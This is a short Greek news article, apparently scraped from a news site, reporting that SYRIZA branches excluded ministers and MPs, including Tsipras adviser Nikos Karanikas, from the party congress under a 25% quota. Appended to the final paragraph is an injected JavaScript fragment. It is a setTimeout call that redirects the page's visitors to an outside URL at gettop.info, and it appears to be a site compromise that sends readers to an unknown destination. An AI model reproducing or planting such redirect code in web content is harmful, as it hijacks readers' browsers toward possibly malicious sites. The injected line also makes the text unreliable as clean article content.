«Κόβουν» από το Συνέδριο ΣΥΡΙΖΑ τον Καρανίκα

0
20

 

Έκπληξη και προβληματισμό προκαλούν στην ηγεσία της κυβέρνησης οι αποφάσεις της βάσης του κυβερνώντος κόμματος να αφήσει εκτός Συνεδρίου που ξεκινά αύριο, κυβερνητικούς και βουλευτές, δείχνοντας πως η εσωκομματική αντιπολίτευση είναι ισχυρή.

Μάλιστα, σαφές μήνυμα έστειλε η κομματική οργάνωση του Παγκρατίου που δεν εξέλεξε τον πρωθυπουργικό συνεργάτη Νίκο Καρανίκα, ο οποίος είναι στενός σύμβουλος του Αλέξη Τσίπρα και υπεύθυνος στρατηγικού σχεδιασμού.

ΑΠό την άλλη πλευρά, η κυβερνητική συνιστώσα «Ενωτική Κίνηση» έχει δώσει σήμα για να «κοπούν» τα στελέχη των «53+», που ετοιμάζονται να ασκήσουν αυστηρή κριτική για την κυβερνητική πολιτική στο συνέδριο.

Σύμφωνα με την ποσόστωση που έχει επιβληθεί για την εκλογή της Κεντρικής επιτροπής, μόνο το 25% των μελών της νέας ΚΕ μπορεί να είναι βουλευτές ή κυβερνητικά στελέχη, από υπουργοί έως επικεφαλής οργανισμών ή με οποιαδήποτε άλλη θέση στον κρατικό μηχανισμό.

Αυτό σημαίνει ότι από μία ΚΟ 144 βουλευτών και πολλαπλάσιων κυβερνητικών στελεχών, μόνο 37 μπορούν να εκλεγούν στην ΚΕ και γι αυτό ο κομματικός μηχανισμός αποφάσισε να κόψει βουλευτές για να εκλέξει αποκλεισιτκά και μόνο στελέχη με έντονη δραστηριότητα στο κόμμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here